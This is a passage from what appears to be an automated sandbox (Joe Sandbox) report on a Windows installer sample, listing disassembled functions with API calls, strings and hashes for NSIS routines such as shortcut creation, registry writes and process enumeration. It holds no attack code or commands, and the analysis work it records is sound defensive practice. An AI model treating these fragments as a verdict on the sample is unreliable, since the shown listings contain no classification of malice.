                                                      • Associated: 00000000.00000002.1318147372.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1318147372.0000000000505000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1318147372.0000000000508000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1318147372.000000000050C000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1318147372.000000000050E000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_PkContent.jbxd
                                                      Similarity
                                                      • API ID: Directory$SystemVersionWindowslstrcatlstrcpynlstrlen
                                                      • String ID: @%F$@%F$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                      • API String ID: 3581403547-784952888
                                                      • Opcode ID: 5b9b76f287d52b653a8a41dc6b1224aada0ccbd74d66441f1f03372adecf381e
                                                      • Instruction ID: 7881bd453c5698e0e02013fa1c3524f2cf467b60749c67c5a59258f73e57ab2a
                                                      • Opcode Fuzzy Hash: 5b9b76f287d52b653a8a41dc6b1224aada0ccbd74d66441f1f03372adecf381e
                                                      • Instruction Fuzzy Hash: F171F4B1A00215ABDB20AF28CD44A7E3771EF55314F12C03FE906B62E0E77C89A19B5D
                                                      APIs
                                                      • CoCreateInstance.OLE32(00409B24,?,00000001,00409B04,?), ref: 0040257E
                                                      Strings
                                                      • CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d, xrefs: 00402560
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1317975118.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1317956249.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1318000582.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1318021031.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1318021031.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1318021031.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1318021031.00000000004B3000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1318147372.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1318147372.00000000004F9000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1318147372.00000000004FB000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1318147372.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1318147372.0000000000505000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1318147372.0000000000508000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1318147372.000000000050C000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1318147372.000000000050E000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_PkContent.jbxd
                                                      Similarity
                                                      • API ID: CreateInstance
                                                      • String ID: CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d
                                                      • API String ID: 542301482-1377821865
                                                      • Opcode ID: 0ddbb4256677b6c48083548557f3f7fdb52e2b2de327cf14ae3b1cdcca70b28b
                                                      • Instruction ID: c24c797a6f187c751e7d972b1a807078ee58ffeb38f484aa28d094541f0f6205
                                                      • Opcode Fuzzy Hash: 0ddbb4256677b6c48083548557f3f7fdb52e2b2de327cf14ae3b1cdcca70b28b
                                                      • Instruction Fuzzy Hash: 02415E74A00205BFCF04EFA0CC99EAE7B79FF48314B20456AF915EB2E1C679A941CB54
                                                      APIs
                                                      • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 00402E27
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1317975118.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1317956249.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1318000582.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1318021031.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1318021031.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1318021031.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1318021031.00000000004B3000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1318147372.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1318147372.00000000004F9000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1318147372.00000000004FB000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1318147372.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1318147372.0000000000505000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1318147372.0000000000508000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1318147372.000000000050C000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1318147372.000000000050E000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_PkContent.jbxd
                                                      Similarity
                                                      • API ID: FileFindFirst
                                                      • String ID:
                                                      • API String ID: 1974802433-0
                                                      • Opcode ID: 005be0a9498432eb51f9697d6085e84733c01c19a866f8c94ce5140aa3afdc34
                                                      • Instruction ID: b91193b5dd17d351e639dca097a4c2443a83fae7855d8014906372cda19badf2
                                                      • Opcode Fuzzy Hash: 005be0a9498432eb51f9697d6085e84733c01c19a866f8c94ce5140aa3afdc34
                                                      • Instruction Fuzzy Hash: 4EE06D32600204AFD700EB749D45ABE736CDF01329F20457BF146F20D1E6B89A41976A
                                                      APIs
                                                      • GlobalAlloc.KERNEL32(00000040,00000FA0), ref: 004063BF
                                                      • lstrlenW.KERNEL32(?), ref: 004063CC
                                                      • GetVersionExW.KERNEL32(?), ref: 0040642A
                                                        • Part of subcall function 0040602B: CharUpperW.USER32(?,00406401,?), ref: 00406031
                                                      • LoadLibraryA.KERNEL32(PSAPI.DLL), ref: 00406469
                                                      • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00406488
                                                      • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 00406492
                                                      • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 0040649D
                                                      • FreeLibrary.KERNEL32(00000000), ref: 004064D4
                                                      • GlobalFree.KERNEL32(?), ref: 004064DD
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1317975118.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1317956249.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1318000582.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1318021031.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1318021031.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1318021031.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1318021031.00000000004B3000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1318147372.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1318147372.00000000004F9000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1318147372.00000000004FB000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1318147372.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1318147372.0000000000505000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1318147372.0000000000508000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1318147372.000000000050C000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1318147372.000000000050E000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_PkContent.jbxd
                                                      Similarity
                                                      • API ID: AddressProc$FreeGlobalLibrary$AllocCharLoadUpperVersionlstrlen
                                                      • String ID: CreateToolhelp32Snapshot$EnumProcessModules$EnumProcesses$GetModuleBaseNameW$Kernel32.DLL$Module32FirstW$Module32NextW$PSAPI.DLL$Process32FirstW$Process32NextW$Unknown
                                                      • API String ID: 20674999-2124804629
                                                      • Opcode ID: a5c47c37ebb79c3570a5199304d67498c128a01cd5ae19e8b8640fa4b13707a3
                                                      • Instruction ID: f5db07f83b48746be4b9c4f5c588c21b75103c60b5638216cabcef37c42edb4d
                                                      • Opcode Fuzzy Hash: a5c47c37ebb79c3570a5199304d67498c128a01cd5ae19e8b8640fa4b13707a3
                                                      • Instruction Fuzzy Hash: 38919331900219EBDF109FA4CD88AAFBBB8EF44741F11447BE546F6281DB388A51CF68
                                                      APIs
                                                      • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 0040416D
                                                      • GetDlgItem.USER32(?,000003E8), ref: 00404181
                                                      • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 0040419E
                                                      • GetSysColor.USER32(?), ref: 004041AF
                                                      • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004041BD
                                                      • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004041CB
                                                      • lstrlenW.KERNEL32(?), ref: 004041D6
                                                      • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004041E3
                                                      • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004041F2
                                                        • Part of subcall function 00403FCA: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,?,00000000,00404124,?), ref: 00403FE1
                                                        • Part of subcall function 00403FCA: GlobalAlloc.KERNEL32(00000040,00000001,?,?,?,00000000,00404124,?), ref: 00403FF0
                                                        • Part of subcall function 00403FCA: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000001,00000000,00000000,?,?,00000000,00404124,?), ref: 00404004
                                                      • GetDlgItem.USER32(?,0000040A), ref: 0040424A
                                                      • SendMessageW.USER32(00000000), ref: 00404251
                                                      • GetDlgItem.USER32(?,000003E8), ref: 0040427E
                                                      • SendMessageW.USER32(00000000,0000044B,00000000,?), ref: 004042C1
                                                      • LoadCursorW.USER32(00000000,00007F02), ref: 004042CF
                                                      • SetCursor.USER32(00000000), ref: 004042D2
                                                      • ShellExecuteW.SHELL32(0000070B,open,00462540,00000000,00000000,00000001), ref: 004042E7
                                                      • LoadCursorW.USER32(00000000,00007F00), ref: 004042F3
                                                      • SetCursor.USER32(00000000), ref: 004042F6
                                                      • SendMessageW.USER32(00000111,00000001,00000000), ref: 00404325
                                                      • SendMessageW.USER32(00000010,00000000,00000000), ref: 00404337
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1317975118.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1317956249.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1318000582.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1318021031.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1318021031.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1318021031.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1318021031.00000000004B3000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1318147372.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1318147372.00000000004F9000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1318147372.00000000004FB000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1318147372.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1318147372.0000000000505000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1318147372.0000000000508000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1318147372.000000000050C000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1318147372.000000000050E000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_PkContent.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$Cursor$Item$ByteCharLoadMultiWide$AllocButtonCheckColorExecuteGlobalShelllstrlen
                                                      • String ID: @%F$N$open
                                                      • API String ID: 3928313111-3849437375
                                                      • Opcode ID: a841256503f372cb329faf737530af9fe18869c9bb3e71d47027397a25b41a99
                                                      • Instruction ID: 2c1438ad93098d7b112eeb2502b55652a68651cb38e922ac8f4fb42b83a973d4
                                                      • Opcode Fuzzy Hash: a841256503f372cb329faf737530af9fe18869c9bb3e71d47027397a25b41a99
                                                      • Instruction Fuzzy Hash: 0F71A4B1900609FFDB109F60DD45EAA7B79FB44305F00843AFA05B62D1C778A991CF99
                                                      APIs
                                                      • lstrcpyW.KERNEL32(0045B2C8,NUL,?,00000000,?,00000000,?,00406C90,000000F1,000000F1,00000001,00406EAE,?,00000000,000000F1,?), ref: 00406AA9
                                                      • CloseHandle.KERNEL32(00000000,000000F1,00000000,00000001,?,00000000,?,00406C90,000000F1,000000F1,00000001,00406EAE,?,00000000,000000F1,?), ref: 00406AC8
                                                      • GetShortPathNameW.KERNEL32(000000F1,0045B2C8,00000400), ref: 00406AD1
                                                        • Part of subcall function 00405DB6: lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DC6
                                                        • Part of subcall function 00405DB6: lstrlenA.KERNEL32(?,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DF8
                                                      • GetShortPathNameW.KERNEL32(000000F1,00460920,00000400), ref: 00406AF2
                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,0045B2C8,000000FF,0045BAC8,00000400,00000000,00000000,?,00000000,?,00406C90,000000F1,000000F1,00000001,00406EAE), ref: 00406B1B
                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00460920,000000FF,0045C118,00000400,00000000,00000000,?,00000000,?,00406C90,000000F1,000000F1,00000001,00406EAE), ref: 00406B33
                                                      • wsprintfA.USER32 ref: 00406B4D
                                                      • GetFileSize.KERNEL32(00000000,00000000,00460920,C0000000,00000004,00460920,?,?,00000000,000000F1,?), ref: 00406B85
                                                      • GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00406B94
                                                      • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00406BB0
                                                      • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename]), ref: 00406BE0
                                                      • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,0045C518,00000000,-0000000A,0040987C,00000000,[Rename]), ref: 00406C37
                                                        • Part of subcall function 00405E50: GetFileAttributesW.KERNELBASE(00000003,004035C7,004DF0D8,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00405E54
                                                        • Part of subcall function 00405E50: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A47,?), ref: 00405E76
                                                      • WriteFile.KERNEL32(?,00000000,?,?,00000000), ref: 00406C4B
                                                      • GlobalFree.KERNEL32(00000000), ref: 00406C52
                                                      • CloseHandle.KERNEL32(?), ref: 00406C5C
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1317975118.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1317956249.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1318000582.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1318021031.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1318021031.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1318021031.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1318021031.00000000004B3000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1318147372.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1318147372.00000000004F9000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1318147372.00000000004FB000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1318147372.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1318147372.0000000000505000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1318147372.0000000000508000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1318147372.000000000050C000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1318147372.000000000050E000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_PkContent.jbxd
                                                      Similarity
                                                      • API ID: File$ByteCharCloseGlobalHandleMultiNamePathShortWidelstrcpylstrlen$AllocAttributesCreateFreePointerReadSizeWritewsprintf
                                                      • String ID: F$%s=%s$NUL$[Rename]
                                                      • API String ID: 565278875-1653569448
                                                      • Opcode ID: a83451b5c4aab99109613fb463f01f18261c5de4d9c28115f8397278e7cafe6e
                                                      • Instruction ID: f97e154d5ee7f709bd30e138c0dd6e282719408add8f0d739c14b832633f1bd9
                                                      • Opcode Fuzzy Hash: a83451b5c4aab99109613fb463f01f18261c5de4d9c28115f8397278e7cafe6e
                                                      • Instruction Fuzzy Hash: AE412632104208BFE6206B619E8CD6B3B6CDF86754B16043EF586F22D1DA3CDC158ABC
                                                      APIs
                                                      • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                      • BeginPaint.USER32(?,?), ref: 00401047
                                                      • GetClientRect.USER32(?,?), ref: 0040105B
                                                      • CreateBrushIndirect.GDI32(00000000), ref: 004010D8
                                                      • FillRect.USER32(00000000,?,00000000), ref: 004010ED
                                                      • DeleteObject.GDI32(?), ref: 004010F6
                                                      • CreateFontIndirectW.GDI32(?), ref: 0040110E
                                                      • SetBkMode.GDI32(00000000,00000001), ref: 0040112F
                                                      • SetTextColor.GDI32(00000000,000000FF), ref: 00401139
                                                      • SelectObject.GDI32(00000000,?), ref: 00401149
                                                      • DrawTextW.USER32(00000000,0046ADC0,000000FF,00000010,00000820), ref: 0040115F
                                                      • SelectObject.GDI32(00000000,00000000), ref: 00401169
                                                      • DeleteObject.GDI32(?), ref: 0040116E
                                                      • EndPaint.USER32(?,?), ref: 00401177
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1317975118.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1317956249.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1318000582.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1318021031.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1318021031.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1318021031.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1318021031.00000000004B3000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1318147372.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1318147372.00000000004F9000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1318147372.00000000004FB000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1318147372.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1318147372.0000000000505000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1318147372.0000000000508000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1318147372.000000000050C000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1318147372.000000000050E000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_PkContent.jbxd
                                                      Similarity
                                                      • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                      • String ID: F
                                                      • API String ID: 941294808-1304234792
                                                      • Opcode ID: f4369597f17a3e87964d78a18e042c43d151941ad2c2ecd61bd33e0f0092c561
                                                      • Instruction ID: e7530e13063599d95e155ed3b2c7b7521dfa2668d538c4695d9c695e9582dc0d
                                                      • Opcode Fuzzy Hash: f4369597f17a3e87964d78a18e042c43d151941ad2c2ecd61bd33e0f0092c561
                                                      • Instruction Fuzzy Hash: 01516C71400209AFCB058F95DE459AF7FB9FF45311F00802EF992AA1A0CB78DA55DFA4
                                                      APIs
                                                      • RegCreateKeyExW.ADVAPI32(?,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004028DA
                                                      • lstrlenW.KERNEL32(004130D8,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 004028FD
                                                      • RegSetValueExW.ADVAPI32(?,?,?,?,004130D8,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004029BC
                                                      • RegCloseKey.ADVAPI32(?), ref: 004029E4
                                                        • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                        • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                      Strings
                                                      • WriteRegBin: "%s\%s" "%s"="%s", xrefs: 004029A1
                                                      • WriteRegDWORD: "%s\%s" "%s"="0x%08x", xrefs: 00402959
                                                      • WriteReg: error creating key "%s\%s", xrefs: 004029F5
                                                      • WriteReg: error writing into "%s\%s" "%s", xrefs: 004029D4
                                                      • WriteRegExpandStr: "%s\%s" "%s"="%s", xrefs: 0040292A
                                                      • WriteRegStr: "%s\%s" "%s"="%s", xrefs: 00402918
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1317975118.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1317956249.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1318000582.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1318021031.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1318021031.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1318021031.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1318021031.00000000004B3000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1318147372.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1318147372.00000000004F9000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1318147372.00000000004FB000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1318147372.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1318147372.0000000000505000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1318147372.0000000000508000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1318147372.000000000050C000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1318147372.000000000050E000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_PkContent.jbxd
                                                      Similarity
                                                      • API ID: lstrlen$CloseCreateValuewvsprintf
                                                      • String ID: WriteReg: error creating key "%s\%s"$WriteReg: error writing into "%s\%s" "%s"$WriteRegBin: "%s\%s" "%s"="%s"$WriteRegDWORD: "%s\%s" "%s"="0x%08x"$WriteRegExpandStr: "%s\%s" "%s"="%s"$WriteRegStr: "%s\%s" "%s"="%s"
                                                      • API String ID: 1641139501-220328614
                                                      • Opcode ID: 51d35262b0c2a2c9e21de093e360e43a16013741a0d7e0050a8341ec78c57d1d
                                                      • Instruction ID: 4ea7a0066738be70411365ddd6f3e5606018e51d84950e7919a1ab5782edcef9
                                                      • Opcode Fuzzy Hash: 51d35262b0c2a2c9e21de093e360e43a16013741a0d7e0050a8341ec78c57d1d
                                                      • Instruction Fuzzy Hash: 3D41BFB2D00209BFDF11AF90CE46DAEBBB9EB04704F20407BF505B61A1D6B94B509B59
                                                      APIs
                                                      • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,000000F0), ref: 00402EA9
                                                      • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,?,000000F0), ref: 00402EC5
                                                      • GlobalFree.KERNEL32(FFFFFD66), ref: 00402EFE
                                                      • WriteFile.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,000000F0), ref: 00402F10
                                                      • GlobalFree.KERNEL32(00000000), ref: 00402F17
                                                      • CloseHandle.KERNEL32(?,?,?,?,?,000000F0), ref: 00402F2F
                                                      • DeleteFileW.KERNEL32(?), ref: 00402F56
                                                      Strings
                                                      • created uninstaller: %d, "%s", xrefs: 00402F3B
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1317975118.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1317956249.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1318000582.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1318021031.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1318021031.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1318021031.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1318021031.00000000004B3000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1318147372.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1318147372.00000000004F9000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1318147372.00000000004FB000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1318147372.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1318147372.0000000000505000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1318147372.0000000000508000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1318147372.000000000050C000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1318147372.000000000050E000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_PkContent.jbxd
                                                      Similarity
                                                      • API ID: Global$AllocFileFree$CloseDeleteHandleWrite
                                                      • String ID: created uninstaller: %d, "%s"
                                                      • API String ID: 3294113728-3145124454
                                                      • Opcode ID: 7d19fd18931236c609f14dd9ebe02190de13aa3954742adab313f132dac73535
                                                      • Instruction ID: 876417c632a2c352b67fb01c84f3ccb8dada3a759dccfb7ac575e016526b3130
                                                      • Opcode Fuzzy Hash: 7d19fd18931236c609f14dd9ebe02190de13aa3954742adab313f132dac73535
                                                      • Instruction Fuzzy Hash: E231B272800115BBCB11AFA4CE45DAF7FB9EF08364F10023AF555B61E1CB794E419B98
                                                      APIs
                                                      • CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,004062D4,00000000), ref: 004060FE
                                                      • GetFileAttributesW.KERNEL32(0046A560,?,00000000,00000000,?,?,004062D4,00000000), ref: 0040613C
                                                      • WriteFile.KERNEL32(00000000,000000FF,00000002,00000000,00000000,0046A560,40000000,00000004), ref: 00406175
                                                      • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,0046A560,40000000,00000004), ref: 00406181
                                                      • lstrcatW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00409678,?,00000000,00000000,?,?,004062D4,00000000), ref: 0040619B
                                                      • lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),?,?,004062D4,00000000), ref: 004061A2
